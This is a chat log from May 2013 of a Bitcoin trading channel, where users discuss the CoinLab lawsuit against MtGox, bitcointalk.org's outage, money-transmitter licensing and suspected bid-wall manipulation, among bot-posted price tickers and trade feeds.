to make a special reservation of "nice people" May 03 02:26:24 force everyone nice to move there May 03 02:26:29 then watch them bore each other to death May 03 02:26:38 o wait never mind, we have the united states already. May 03 02:28:32 we arent bored, we have TV! May 03 02:29:33 and just in bierbier May 03 02:33:40 SPRINGFIELD, MO, – May 2, 2013 – AMC today that it has declared a special dividend of .0000001 per share for it members. May 03 02:33:53 ^^ bitfunder frontpage lulz May 03 02:34:14 accidentally dividend May 03 02:35:10 springfield mo! May 03 02:36:21 ;;next May 03 02:36:21 target: 100-104 | updated by OneFixt at May 2 2013, 22:15 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 1 hour, 21 minutes, and 16 seconds ago May 03 02:38:18 I'm interested to see how AM decides to handle this selling of USB miners May 03 02:38:54 only practical method I can think of is to have a flat price and first come, first served May 03 02:38:59 they can make a killing May 03 02:39:00 those are made to rub it in bfls face? May 03 02:39:02 but if they auction they'd make more money May 03 02:39:04 nah, sell off batches of 100 - 1000 May 03 02:39:09 kakobrekla yup May 03 02:39:19 or more practically, to kill their market. May 03 02:39:28 but they will get legions of poor people crying if they dont sell singles May 03 02:39:42 notice that they only got the move on them once bfl actually started delivering May 03 02:39:56 im pretty sure they were going to match whatever product bfl was shipping, if they started with singles same deal. May 03 02:40:03 pretty decent business head somewhere in the am team. May 03 02:44:17 https://bitcointalk.org/index.php?topic=192661.msg2010652#msg2010652 May 03 02:44:22 and the "has issues" prize goes to... May 03 02:44:59 yes that is dog May 03 02:45:24 also rikur promises to make further timetables and other proofs. May 03 02:46:00 i kinda like it when people feel that a simple "dude, i suck, you're so much better than me" is not quite adequate May 03 02:46:12 so they proceed to spell it out over thousands of words, add drawings... May 03 02:46:22 really give out their time and energy to make the point. May 03 02:49:06 [HAVELOCK] [VTX] 2 @ 0.47110001 = 0.9422 BTC [-] May 03 02:49:07 [HAVELOCK] [VTX] 2 @ 0.46990001 = 0.9398 BTC [-] May 03 02:49:41 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [+] May 03 02:53:06 [HAVELOCK] [HIM] 3 @ 1.92 = 5.76 BTC [+] May 03 02:53:08 [HAVELOCK] [HIM] 1 @ 1.92 BTC [+] May 03 02:54:16 [MPEX] [S.MPOE] 15847 @ 0.00071634 = 11.3518 BTC [-] **** BEGIN LOGGING AT Fri May 3 13:44:03 2013 May 03 13:44:08 woow May 03 13:44:17 ;;ticker May 03 13:44:19 BTCUSD ticker | Best bid: 90.14946, Best ask: 90.17776, Bid-ask spread: 0.02830, Last trade: 90.14946, 24 hour volume: 287950.79400385, 24 hour low: 85.01000, 24 hour high: 118.00000, 24 hour vwap: 99.70197 May 03 13:44:22 aww May 03 13:44:24 wtf, did their domain expire with them forgetting to renew it ? May 03 13:44:28 who ? May 03 13:44:34 bitcointalk.org May 03 13:44:45 no, they were hosted by mtgox May 03 13:44:52 which is being raided by japanese police reading maps May 03 13:45:13 reddit hivemind says it was paid until 2021 but got prolly hijacked May 03 13:45:31 mircea_popescu: know about the lawsuit already? May 03 13:45:37 doesn't look available May 03 13:45:38 which one ? May 03 13:45:44 Which is why you should always turn on the registrar lock :D May 03 13:45:44 they haven't been hosted by mtgox for a while now May 03 13:45:45 cinlab is suing gox May 03 13:45:53 lol yeah. May 03 13:45:55 they were hosted by "private internet access" May 03 13:46:00 http://gawker.com/massive-bitcoin-business-partnership-devolves-into-75-487857656 May 03 13:46:03 jurov: popcorn for everyone May 03 13:46:44 mircea, there are moar lawsuits since yest? May 03 13:46:54 in coinland May 03 13:47:52 well bitcoins party has ended May 03 13:49:08 it's on pause May 03 13:49:22 yea for a very long time. May 03 13:49:30 i'd say 1 or 1.5 years May 03 13:49:31 last pause took 2 years to surpass a high May 03 13:49:34 this time probably even longer May 03 13:49:49 probably May 03 13:50:16 less May 03 13:51:59 i'm not into analysis at all but this actually looks sane: http://i.imgur.com/WRRJnUS.png May 03 13:53:00 i think the timeframe will probably be somewhat similar, but the next bubble might take us into 3000 USD/BTC territory May 03 13:53:08 or not May 03 13:53:14 we'll see May 03 13:53:25 if we don't die stupidly until then May 03 13:53:35 who here is surprised that gox acted like gox and coinlab acted like coinlab May 03 13:53:38 choking on the popcorn we eat watching the coinlab/mtgox farce May 03 13:54:00 i'm surprised that they need to take it to the public place May 03 13:54:07 ok who the hell pulled the plug May 03 13:54:11 lol May 03 13:54:43 so Disrupt was happening in NYC May 03 13:54:52 and a bunch of cali vc's were talking about bitcoin May 03 13:54:58 one of them had a great point May 03 13:55:23 he said something to the effect of...people have been building some businesses, but I think you will see a second wave of businesses start May 03 13:55:35 and that is what i think is happening May 03 13:55:40 first wave is dying May 03 13:55:46 second wave is preparing May 03 13:56:44 tiberiusiv added to ignore list. May 03 13:57:34 i think we're going to see lots of press about the immaturity of bitcoin, a couple of years will pass, someone will make a major announcement, and suddenly the roller-coaster starts climbing the trend again May 03 13:57:34 who here is surprised that gox acted like gox and coinlab acted like coinlab << nobody. May 03 13:57:45 besides the new people might not know the tradehill dwolla lawsuit May 03 13:58:00 https://twitter.com/Mircea_Popescu/status/329856208393613312 May 03 13:58:03 [HAVELOCK] [SDICE] 10 @ 0.31499999 = 3.15 BTC [+] May 03 13:58:27 first wave is dying << fu mpex will eat you all May 03 13:59:56 [BTCTC] [PAJKA.BOND] 10 @ 0.1077 = 1.077 BTC [-] May 03 13:59:58 i only met kids from startup incubator few times and have enough "waves" talk for lifetime May 03 14:00:13 waves ? May 03 14:00:43 tlaking about something coming up in waves, new paradigms etc. May 03 14:01:10 o that stuff May 03 14:02:23 obviously mpex was excluded from that statement May 03 14:02:33 if that wasn't obvious to all here May 03 14:02:41 also satoshidice May 03 14:02:45 and bitbet May 03 14:02:52 maybe a few others May 03 14:05:21 mjr_ what would you say to company named "Improbable Solutions LLC"? May 03 14:05:34 just using you as a lab rat for a moment May 03 14:05:53 sounds interesting May 03 14:06:14 i would say i feel pretty neutral so far May 03 14:06:17 but i'm still listening May 03 14:07:07 good. i'm going to found it and wasn't sure if it doesn;t sound too negative May 03 14:07:25 nah, i wouldn't say negative May 03 14:07:31 overall neutral i think May 03 14:07:45 if it's interesting and maybe a bit funny then it's what i need May 03 14:09:15 yes, it is both of those May 03 14:11:42 thx. problem solved. May 03 14:15:10 i had a friend that wanted to emphasize how creative he is May 03 14:15:26 so he started a company First Media - procreative studio May 03 14:16:14 even to me it was obvious he rather "overdid" it... so doesn't hurt to ask native speakers :) May 03 14:19:03 :p May 03 14:20:53 lol May 03 14:21:06 procreative? May 03 14:21:27 yes. some are proactive, so he can be procreative May 03 14:21:45 lol i think i get what he was going for...but procreation is having sex May 03 14:22:02 was that intentional? May 03 14:22:32 not at all. he refused to even admit when i pointed out May 03 14:22:41 hahaha May 03 14:22:43 Welcome to the future home of "bitcointalk.org" May 03 14:22:45 Domain Management Login May 03 14:22:47 Need to enable web hosting? May 03 14:22:49 durp May 03 14:23:01 you took over the domain? May 03 14:23:18 MJR_: I suggest you visit the website May 03 14:23:25 its down... May 03 14:23:37 ;;isitup bitcointalk.org May 03 14:23:38 Error: "isitup" is not a valid command. May 03 14:23:41 https is down, http is parked May 03 14:23:42 ;;isitdown bitcointalk.org May 03 14:23:43 bitcointalk.org is up May 03 14:23:54 lol i see it now May 03 14:24:54 jurov is right May 03 14:25:02 [HAVELOCK] [HIM] 3 @ 1.93 = 5.79 BTC [+] May 03 14:26:08 I like "Improbable Solutions LLC"? May 03 14:26:18 minus the ? May 03 14:26:37 sounds sorta like a television/movie/cg studio May 03 14:26:48 ThickAsThieves: that's why the name is quoted. fix your parser :D May 03 14:27:08 my parser just woke up May 03 14:27:10 :) May 03 14:28:56 he slept with his parser May 03 14:29:03 which is ga-ha-hay May 03 14:30:18 mp, is there a goxcoinlablol trilema post yet? May 03 14:30:45 the world is waiting May 03 14:31:44 there's twitter one already. whole thing prolly not worthy of his further consideration ;) May 03 14:31:53 ThickAsThieves noap May 03 14:32:00 i already posted about coin* fail May 03 14:32:06 what, am i gonna spam myself every time they do ? May 03 14:32:17 a ok give jurov cookies! May 03 14:32:42 https://twitter.com/fredwilson/status/330282608183345152 May 03 14:32:46 omnomnom May 03 14:32:47 ok, that is wilson's office May 03 14:32:49 *gurp* May 03 14:32:59 what the bloody fuck i know real estate agents IN ROMANIA with a better office May 03 14:33:36 who is fred wilson? May 03 14:33:45 someone that likes to drink a lot May 03 14:34:26 a vc guy May 03 14:34:26 his twitter says "I am a VC" May 03 14:34:27 lotta bozze May 03 14:34:55 Bugpowder its prolly giftsd May 03 14:35:03 at some point it was fashionable to give people bottles May 03 14:35:07 i think by now its subsiding May 03 14:35:32 The Dominae de Canton is half empty May 03 14:35:36 ginger liquer May 03 14:35:50 a flask May 03 14:35:54 any good? May 03 14:35:57 yeah May 03 14:36:02 i like ginger stuff May 03 14:36:05 I mean, for a mixed drink May 03 14:36:10 gingerale for adults May 03 14:36:12 or I guess you can shoot it May 03 14:38:05 ginger ale is a rarity in restaurants here for some reason (north FL) May 03 14:38:20 it's abundant in the northeast tho May 03 14:38:34 too exotic for the rednecks maybe May 03 14:43:05 yeah its at the bar a block away from here May 03 14:44:10 actually i think my fav liqueur is this italian thing May 03 14:44:12 strega May 03 14:45:48 [BTCTC] [ASICMINER-PT] 23 @ 1.31897 = 30.3363 BTC [-] May 03 14:45:58 [BTCTC] [ASICMINER-PT] 38 @ 1.31897 = 50.1209 BTC [-] May 03 14:48:10 means "witch" sounds cool May 03 14:54:23 so i go "summarize this" May 03 14:54:35 i get back "karpeles says he has no idea what's going on." May 03 14:54:41 i'm like "right. why do i even bother." May 03 15:10:19 ;;ticler May 03 15:10:19 Error: "ticler" is not a valid command. May 03 15:10:21 ;;ticker May 03 15:10:22 BTCUSD ticker | Best bid: 82.30001, Best ask: 82.71226, Bid-ask spread: 0.41225, Last trade: 83.00000, 24 hour volume: 319970.07153489, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 97.26344 May 03 15:10:43 ;;bids 51 May 03 15:10:46 There are currently 109437.13 bitcoins demanded at or over 51.0 USD, worth 7184724.87849 USD in total. | Data vintage: 0.0054 seconds May 03 15:19:19 what happened to all the options? May 03 15:19:44 oh - there are some left, nm May 03 15:22:03 [HAVELOCK] [HIM] 1 @ 1.9297 BTC [-] May 03 15:22:04 [HAVELOCK] [HIM] 1 @ 1.9199 BTC [-] May 03 15:24:00 ,,eightball are we doomed ? May 03 15:24:07 ;;eightball are we doomed ? May 03 15:24:07 One would be wise to think so. May 03 15:27:06 [HAVELOCK] [SDICE] 10 @ 0.3199 = 3.199 BTC [+] May 03 15:29:08 why are options disappearing? May 03 15:30:04 mpoe bot decided not to put orders? May 03 15:30:36 $avg May 03 15:30:37 jurov: 96.96 May 03 15:30:44 this works, tho May 03 15:34:11 [BTCTC] [ASICMINER-PT] 1 @ 1.31897 BTC [-] May 03 15:37:17 leotreasure options are periodically refreshed. May 03 15:37:52 thanks mircea_popescu - do you know if they're coming back soon? May 03 15:37:59 already there May 03 15:38:01 they're on right now May 03 15:38:08 sweet thanks! May 03 15:38:22 you will have momentary gaps now and again as the old ones expire / new ones go in. May 03 15:38:39 due to the quantic nature of the universe? May 03 15:38:49 also butts. May 03 15:39:24 karpeles made a statement regarding the lawsuit, basically : "i'm 12 what is this" May 03 15:39:47 He did? Where? May 03 15:40:05 https://mtgox.com/pdf/20130503_coinlab_lawsuit.pdf May 03 15:40:28 dude wtf happened while I was asleep¿?? May 03 15:40:46 fucking hilarious, the mark and peter are both on the foundation board, and he didn't even know he was being sued? May 03 15:40:55 thestringpuller: your brain re-organizing information, dreaming, wetting your sheets maybe May 03 15:41:09 fuck I'll have to read about this shiznit later May 03 15:41:15 got papers to finish May 03 15:41:22 its pretty hilarious May 03 15:41:39 but it ain't pretty :-) May 03 15:41:39 karpeles made a statement regarding the lawsuit, basically : "i'm 12 what is this" << so i go "summarize this" i get back "karpeles says he has no idea what's going on." i'm like "right. why do i even bother." May 03 15:42:02 The press release looks sensible to me. May 03 15:42:14 aren't you the "lag looks sensible to me " guy? May 03 15:42:25 lol May 03 15:42:31 Would be stupid to comment out of the blue when it can potentially cost you 75 million USD. May 03 15:42:40 well, it's sensible but it's still funny he doesn't know shit May 03 15:42:55 ya, it's always sensible to appear clueless whern being sued. May 03 15:43:08 Obviously CoinLab didn't tell him. May 03 15:43:08 if anyone was pondering whether to join in the fray, just the signal they need May 03 15:43:09 derp May 03 15:44:17 POPCORN FOR BTC! POPCORN FOR BTC! May 03 15:44:39 Something is fishy here. How could CoinLab be ready at the 22nd, three days after the FinCEN statement? I doubt it. May 03 15:44:58 hey guys I gotta run but when tiberusiv shows up, call him an idiot for me. May 03 15:45:06 The case will probably end with some kind of settlement. CoinLab trying to put the blame on MtGox. May 03 15:45:08 tx May 03 15:45:54 Something is fishy here. How could CoinLab be ready at the 22nd, three days after the FinCEN statement? I doubt it. << pretty easy actually. May 03 15:45:57 how do you know how the case will end up ? May 03 15:46:06 CoinLab probably has a lot of pissed customers on their end. May 03 15:46:14 They were probably already registering for the MSB license May 03 15:46:20 which is all fincen was requiring of them. May 03 15:46:31 not really any customers, they just got the seething ego of vessenes whom i've trashed to all shit and publicly humiliated for three lifetimes. May 03 15:46:43 imsaguy: no, that would be for fixed rate exchangers May 03 15:46:55 so no, this lawsuit is not ending in a settlement. you can't settle egos. May 03 15:47:12 exchanges like mtgox need other licenses May 03 15:47:36 that in itself was already dodgy May 03 15:47:37 davout arguably coinlab was not an exchange. without going into the whole legal theiory here May 03 15:47:48 what they were trying to do is exploit a present hole in legislation. May 03 15:48:01 coinlab was going to handle the cash May 03 15:48:04 gox handle the exchange May 03 15:48:10 they failed, through mostly everone involved being ignorant idiots May 03 15:48:11 if they aren't counterparty to transactions they are an exchange and hold fiat on behalf of third-parties May 03 15:48:33 imsaguy: the technical platform does not matter, it's the entity that holds the funds who needs the license May 03 15:48:40 ... May 03 15:48:47 this is not france you know. May 03 15:48:59 did I not just say they were already registering for the license when fincen released their guidance? May 03 15:49:16 imsaguy: i'm saying they'd need a different license May 03 15:49:23 which? May 03 15:49:39 and more importantly, how do you know they hadn't started the process for that? May 03 15:49:43 I understand you need a licence for each state if you are going to hold user funds. May 03 15:50:10 i have no idea, like mircea_popescu said it is not france, but the fincen guidance referred to people exchanging btc for fiat, not for people who sit in the middle and acts as escrow May 03 15:50:17 Those licences aren't cheap. May 03 15:50:27 no May 03 15:50:34 sturles: yup, and you gotta get one in each state May 03 15:50:35 they typically require a $25M bond May 03 15:50:52 that in and of itself prices many out May 03 15:52:08 My guess is that CoinLab wasn't ready, but don't see themselves as beeing in breach of contract. Transferred customers wouldn't be able to transfer funds or trade. May 03 15:52:38 [MPEX] [O.USD.C080T] 108 @ 0.38603715 = 41.692 BTC May 03 15:52:46 The court filing attached the contract May 03 15:52:58 the scribd document of the court filing failed to include said contract May 03 15:52:59 and that might be because the msb license itself isn't enough, but hey, just my opinion May 03 15:53:01 I would like to read it May 03 15:53:16 huh? coinlab is the suer... May 03 15:53:16 imsaguy: yea me too! May 03 15:53:30 why would they be worried about bein in breach of contract May 03 15:53:37 they are saying gox breached the contract May 03 15:53:45 the problem with all of the fincen guidance is it is untested May 03 15:53:59 until it hits a court, people can kind of do what they want May 03 15:54:03 and think they are in compliance May 03 15:54:54 yep May 03 15:58:01 did anyone find the actual contract that should be attached to the filing ? May 03 15:58:54 davout > http://fr.scribd.com/doc/139181173/Contract-between-Mt-Gox-and-Coinlab May 03 15:59:04 LainZ: thank you May 03 15:59:59 You're going to San Jose right davout ? May 03 16:00:43 ;;ticker May 03 16:00:44 BTCUSD ticker | Best bid: 81.83435, Best ask: 81.85530, Bid-ask spread: 0.02095, Last trade: 81.85530, 24 hour volume: 315308.23666282, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 96.42800 May 03 16:00:47 LainZ: thank you May 03 16:02:16 LainZ: not sure yet, there's like a shit ton of stuff to do here May 03 16:02:16 the main reason that contract is relevant is because it shows the targets May 03 16:02:36 which are i imagine news to many people who misrepresent the exchange revenues etc. May 03 16:03:08 mircea_popescu: they seem kinda low May 03 16:03:28 notrly. May 03 16:03:38 if you know what things are really like they're sort of ambitious. May 03 16:05:08 dunno, if you take an average 1% fee on the volume it's like 30M USD volume, there's lots of room to cover the costs, don't think so? May 03 16:05:38 the thing that surprised me about the contract May 03 16:05:49 ya well, this is why buffett said acquisitions are always at a disadvantage ot the buyer May 03 16:05:58 is that coinlab agreed to make 10% more than previous year revenue for 0 years May 03 16:05:59 10 May 03 16:06:20 ThickAsThieves why surprised ? we know they don't jhave a business strategist. May 03 16:06:39 like who would bet on a bitcoin business for 10 years at this point May 03 16:06:48 i wouldnt even bet 2 May 03 16:06:58 ;;bc,stat May 03 16:06:59 Error: "bc,stat" is not a valid command. May 03 16:07:02 ;;bc,stats May 03 16:07:05 Current Blocks: 234340 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 1531 blocks | Next Difficulty In About: 1 week, 3 days, 9 hours, 57 minutes, and 33 seconds | Next Difficulty Estimate: 10137984.6621 | Estimated Percent Change: 0.61225 May 03 16:07:16 ThickAsThieves speaking of which : May 03 16:07:16 http://trilema.com/2013/the-best-investments-in-the-history-of-bitcoin/ May 03 16:07:50 awesome May 03 16:08:01 [BTCTC] [ASICMINER-PT] 1 @ 1.29501 BTC [-] May 03 16:09:56 o look bitbet May 03 16:10:09 hehe May 03 16:10:13 must be some cool guys May 03 16:10:14 nice one again mircea_popescu been reading your blog for a long time and it is greatly appreciated, thanks! May 03 16:10:23 my pleasure. May 03 16:12:32 http://jpkoning.blogspot.ca/2013/05/bitcoins-hyperdeflationary-recession.html May 03 16:14:28 actually, anyone with a reddit account kind enough to spread the luv ? May 03 16:14:44 we have a responsibility to educate our inferior friends over there. May 03 16:14:48 share that blog post? May 03 16:14:52 yeh May 03 16:15:04 [HAVELOCK] [VTX] 1 @ 0.4797 BTC [+] May 03 16:15:17 mircea_popescu just wants someone to buy his trilema credits :) May 03 16:15:33 ya i'm only making more than most bitcoin businesses from those credits so... May 03 16:15:35 gotta push it. May 03 16:16:04 [HAVELOCK] [HIM] 1 @ 1.945 BTC [+] May 03 16:16:12 Can I get free trilemma credits if I do? May 03 16:16:26 i thought you already had some May 03 16:16:36 haha I is just messin with you May 03 16:16:45 aren't you inhibitor on reddit mircea_popescu ? May 03 16:16:49 mircea_popescu: you do write quite a few articles so i guess they're deserved! May 03 16:16:50 peeps always messin' with ma style May 03 16:16:57 haven't bought any yet :-) May 03 16:17:22 well they're in bitcoin so that's understandable. May 03 16:17:30 me neither, using hidemyass works well:) May 03 16:18:13 lol May 03 16:18:33 that MOneyness article is so-so May 03 16:18:40 what is it, 5 free per day? May 03 16:18:42 he conveniently ignores some things May 03 16:18:44 per week May 03 16:18:46 but also May 03 16:18:52 ah cool May 03 16:19:00 he ignores a huge factor regarding SR May 03 16:19:01 ThickAsThieves i think he's a noob mostly. bitcvopin noob i mean May 03 16:19:04 he's an economist May 03 16:19:07 competition May 03 16:19:10 also May 03 16:19:12 in SR May 03 16:19:12 mircea_popescu: implements incredibly tight security on mpex, enforeces payments using the client IP :D May 03 16:19:18 what happens is May 03 16:19:32 certain sellers get very successful May 03 16:19:40 cuz people want an easy trust choice May 03 16:19:42 davout well yeah. what, people want to steal books ? let them. May 03 16:19:47 then those sellers leave SR May 03 16:19:50 and go privaye May 03 16:19:53 private* May 03 16:19:59 a excellent point you have there May 03 16:20:08 should make a comment on his blog prolly. this is unobvious but solid. May 03 16:21:01 SR has no way to obfuscate customer data, so no way to retain customers May 03 16:21:09 http://www.reddit.com/r/Bitcoin/comments/1dm85o/the_best_investments_in_the_history_of_bitcoin/ May 03 16:21:42 upvoted May 03 16:21:51 lol it picked mp's smug face again May 03 16:21:58 lol May 03 16:22:43 mircea_popescu: why is pirate/usagi considered non-investment? May 03 16:22:47 i mean its dubious and all May 03 16:23:01 but as long you werent the last fool holding the bag ... May 03 16:23:07 trollcointalk down? May 03 16:23:15 kakobrekla: lol May 03 16:23:41 kakobrekla: trolling there stopped long ago May 03 16:23:47 its been made of pure fail past 4 months May 03 16:23:49 unserious. May 03 16:24:30 ezdiy wait what ?! May 03 16:24:47 it's not considered an investment because it's not an investment. May 03 16:24:48 mircea_popescu: just pull out the principal if its a ponzi May 03 16:24:51 and you win the game May 03 16:24:51 needs a business to be an investment. May 03 16:25:00 well, it works May 03 16:25:03 until it fails May 03 16:25:05 :) May 03 16:25:07 moving money from pocket to pocket is neither business nor investment May 03 16:25:11 heh. that's not how it goes, no. May 03 16:25:21 but you imply *everybody* loses May 03 16:25:25 which is simply not true May 03 16:25:28 everybody does lose. May 03 16:25:37 yes, it's simply true. if economy consists of this idiocy we all starve May 03 16:25:38 period. May 03 16:25:46 why? May 03 16:25:53 i made money with pirate May 03 16:25:54 fuck economy May 03 16:26:51 ezdiy: just few days you argued with me mpex is just a bucket shop May 03 16:26:59 yes, well, the opinions of retarded 15yos aside, things are what they are. May 03 16:27:00 now everything someone makes money from is legit? May 03 16:27:02 well, isnt it? May 03 16:27:08 i mean, how do you write options in mpex? May 03 16:27:08 :) May 03 16:27:12 sigh. May 03 16:27:33 jurov: bucket shops are legit May 03 16:27:47 actually anything morally dubious is legit as long its transparent May 03 16:27:47 ezdiy, there is an api for writing options, or what are you asking for? May 03 16:28:05 this is the problem of talking to the ignorant. to them all the words mean the same thing and it changes randomly. so therefore discussion is an exercise in what, aesthetics. May 03 16:28:32 jurov: transparency May 03 16:28:33 :) May 03 16:29:49 can you elaborate? May 03 16:29:53 there are two ways to create an option May 03 16:29:59 either SPLIT May 03 16:30:05 or MKOPT May 03 16:30:09 i believ May 03 16:30:12 ezdiy knows, he's just trolling May 03 16:30:15 ah cool May 03 16:30:21 nice job ezdiy May 03 16:30:22 jurov: well, as long things are not transparent May 03 16:30:28 there are ignorants May 03 16:30:32 nyse is bucket shop then, too you can't even access IPO directly without going through some intermediary bank May 03 16:30:38 herpderp May 03 16:30:53 for example May 03 16:31:01 you were ignorant for listing a ponzi May 03 16:31:30 what ? May 03 16:32:01 anyhway, enough of this, i have people to meet. catch you all later May 03 16:35:01 if i visit a mining pool, and it spits out "Access denied for user 'ltc'@'localhost' (using password: YES)" May 03 16:35:13 is that something that will be exploited once live again? May 03 16:35:33 website i mean May 03 16:35:39 no May 03 16:35:49 word May 03 16:35:53 that means mysql denies access May 03 16:36:05 i think their host doesnt want them anymore May 03 16:36:43 ;;ticker May 03 16:36:44 BTCUSD ticker | Best bid: 86.00000, Best ask: 87.37727, Bid-ask spread: 1.37727, Last trade: 88.93000, 24 hour volume: 317169.48209858, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 96.07508 May 03 16:38:32 ThickAsThieves: it means that you're a hack (if you're spitting out errors to visitors that reveal database details) May 03 16:38:52 and that you should go back to writing hello world applications May 03 16:40:49 [BTCTC] [BITVPS] 1 @ 0.00167 BTC [-] May 03 16:41:06 well, i should known with a name like give-me-ltc.com May 03 16:42:20 ;;ticker May 03 16:42:23 BTCUSD ticker | Best bid: 90.10000, Best ask: 90.35000, Bid-ask spread: 0.25000, Last trade: 90.10000, 24 hour volume: 322025.96705327, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 95.95725 May 03 16:42:59 lolercoaster May 03 16:43:53 like 8k bidwall at 90 now May 03 16:44:04 someone wants to sell coins at a higher price May 03 16:46:25 http://trilema.com/2013/the-best-investments-in-the-history-of-bitcoin/ May 03 16:46:27 poor giga May 03 16:47:42 [BTCTC] [ASICMINER-PT] 2 @ 1.3187 = 2.6374 BTC [+] May 03 16:48:52 [BTCTC] [COGNITIVE] 3 @ 0.3195 = 0.9585 BTC [+] May 03 16:54:04 ;;goxlag May 03 16:54:05 MtGox lag is 17.070391 seconds. During this time, light travels 0.0342088724344 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). May 03 17:08:02 im a goat! May 03 17:08:22 I'm a Rhino May 03 17:08:40 awesome :) May 03 17:09:09 hurray the forums are back May 03 17:09:13 ;;ticker May 03 17:09:14 BTCUSD ticker | Best bid: 93.00000, Best ask: 93.99989, Bid-ask spread: 0.99989, Last trade: 93.00000, 24 hour volume: 330614.82688208, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 95.36606 May 03 17:10:13 why were they down? May 03 17:10:13 Likewise May 03 17:10:34 nice to see btc back in the 90s May 03 17:11:09 bitcointalk is still down for me May 03 17:11:47 works in tbhailand May 03 17:11:53 and in yurp May 03 17:12:15 they were down since yesterday May 03 17:12:20 I wanted to post dividends but couldnt May 03 17:13:58 hmm was just down again for me May 03 17:14:02 but now bacvk May 03 17:14:05 [HAVELOCK] [SDICE] 7 @ 0.315 = 2.205 BTC [-] May 03 17:14:06 [HAVELOCK] [SDICE] 1 @ 0.31 BTC [-] May 03 17:14:07 [HAVELOCK] [SDICE] 13 @ 0.31 = 4.03 BTC [-] May 03 17:14:15 Still see the domain registration page on it May 03 17:15:46 lol did they forgetto pay for the domain? May 03 17:16:04 [HAVELOCK] [SDICE] 1 @ 0.30079994 BTC [-] May 03 17:16:05 [HAVELOCK] [SDICE] 7 @ 0.30079994 = 2.1056 BTC [-] May 03 17:16:19 Looks like it May 03 17:16:21 Or hacked May 03 17:16:54 maybe they need more funding May 03 17:17:05 ]they only have like 500k usd for the forum May 03 17:29:23 forums are back? doesnt load for me May 03 17:30:03 for some yes May 03 17:30:06 i get it May 03 17:30:13 others ahve said no May 03 17:30:23 well give it here! May 03 17:30:32 "I just dont get it" :P May 03 17:31:04 [HAVELOCK] [SDICE] 1 @ 0.30079994 BTC [-] May 03 17:31:04 bitcointalk is up May 03 17:31:07 109.201.133.65 May 03 17:31:12 just hit that ip May 03 17:31:13 down I say! :P May 03 17:31:25 ;;title 109.201.133.65 May 03 17:31:28 Bitcoin Forum - Index May 03 17:31:31 :P May 03 17:31:37 ;;echo Down Down DOWN! May 03 17:31:37 Down Down DOWN! May 03 17:31:39 :P May 03 17:32:21 theres like... no updates lol May 03 17:38:49 ;;ticker May 03 17:38:50 BTCUSD ticker | Best bid: 93.32002, Best ask: 94.30000, Bid-ask spread: 0.97998, Last trade: 94.30000, 24 hour volume: 311433.29392122, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 94.99566 May 03 17:49:15 ;;ticker May 03 17:49:16 BTCUSD ticker | Best bid: 97.10688, Best ask: 97.90000, Bid-ask spread: 0.79312, Last trade: 98.00000, 24 hour volume: 311640.01921008, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 94.92621 May 03 18:04:55 [MPEX] [S.MPOE] 5400 @ 0.00069719 = 3.7648 BTC [-] May 03 18:06:46 [BTCTC] [ESECURITYSABTC] 2 @ 0.38499 = 0.77 BTC [+] May 03 18:07:10 [BTCTC] [B.YABMC] 10 @ 0.0155 = 0.155 BTC [+] May 03 18:07:22 [BTCTC] [B.YABMC] 95 @ 0.01599 = 1.5191 BTC [+] May 03 18:07:34 [BTCTC] [B.YABMC] 80 @ 0.016 = 1.28 BTC [+] May 03 18:10:31 [BTCTC] [ASICMINER-PT] 1 @ 1.3187 BTC [+] May 03 18:11:35 ;;ticker May 03 18:11:36 BTCUSD ticker | Best bid: 94.75000, Best ask: 95.09000, Bid-ask spread: 0.34000, Last trade: 94.69001, 24 hour volume: 305443.43095715, 24 hour low: 79.00000, 24 hour high: 114.73100, 24 hour vwap: 94.87912 May 03 18:12:23 not sure how many of you have been following my tinfoil gox manipulator rants May 03 18:12:31 but if you believe them whatsoever May 03 18:12:42 i want to update that the 20k wall at 70 May 03 18:12:45 is now at 8k May 03 18:13:09 what's the game being played? May 03 18:13:10 so this manipulator is probably using some of that coin May 03 18:13:17 not coin, cash May 03 18:13:22 to prop up the price at 90 May 03 18:13:44 benkay, May 03 18:13:47 basically May 03 18:13:56 afte rthe midapril bubble burst May 03 18:14:05 we were chilling in the 60s for a while May 03 18:14:16 things were actually sorta stable May 03 18:14:27 then someone posted a bidwall at 70 May 03 18:14:30 all at once May 03 18:14:34 at about 15k May 03 18:14:46 everyone just sorta ignored it May 03 18:14:50 and built on top of it May 03 18:14:59 really its the whole foundation that got us to 160 May 03 18:15:05 once we hit 80 May 03 18:15:09 he put up another May 03 18:15:27 and he probly helped build the whole bubble last time too May 03 18:15:35 well May 03 18:15:44 today is the first day since it appearred May 03 18:15:50 that it has dropped in size May 03 18:16:10 and a couple hours ago May 03 18:16:18 someone rallied the price from 82 to 90 May 03 18:16:23 and posted new bidwalls May 03 18:16:28 that was probably him May 03 18:16:42 he's letting everyone else thicken the bidbook May 03 18:16:47 and buy above his walls May 03 18:16:52 so he can crash when ready May 03 18:19:25 there is risk to what he is doing May 03 18:19:26 but May 03 18:19:35 if he is the biggest player on gox May 03 18:19:38 not much risk May 03 18:19:43 i think people over think this stuff:) May 03 18:19:55 possibly May 03 18:20:02 but can you refute it? May 03 18:20:20 lol May 03 18:20:35 i asked matonis last night for a comment on the legitimacy of the foundation May 03 18:20:39 "Please understand that due to ongoing discussions, I am unable to comment publicly. I agree with you about a strong foundation and I would add that it needs a neutral and independent executive director" May 03 18:20:39 no i cant refute crazy ramblings, i agree you MIGHT be correct May 03 18:21:04 " I will definitely make a comment when things become more clear. Thanks for your support." May 03 18:21:04 its not THAT crazy May 03 18:21:06 whatever that means May 03 18:21:11 jcpham fuck the foundation, this is btc May 03 18:21:15 i'm not normally a tinfoil kinda guy May 03 18:21:26 but i watched these things happen May 03 18:21:34 and decided to theorize answers May 03 18:21:35 t crazy May 03 18:21:38 but i see not evidance to support it, or say its not true May 03 18:21:58 how would you explain the sudden bidwalls? 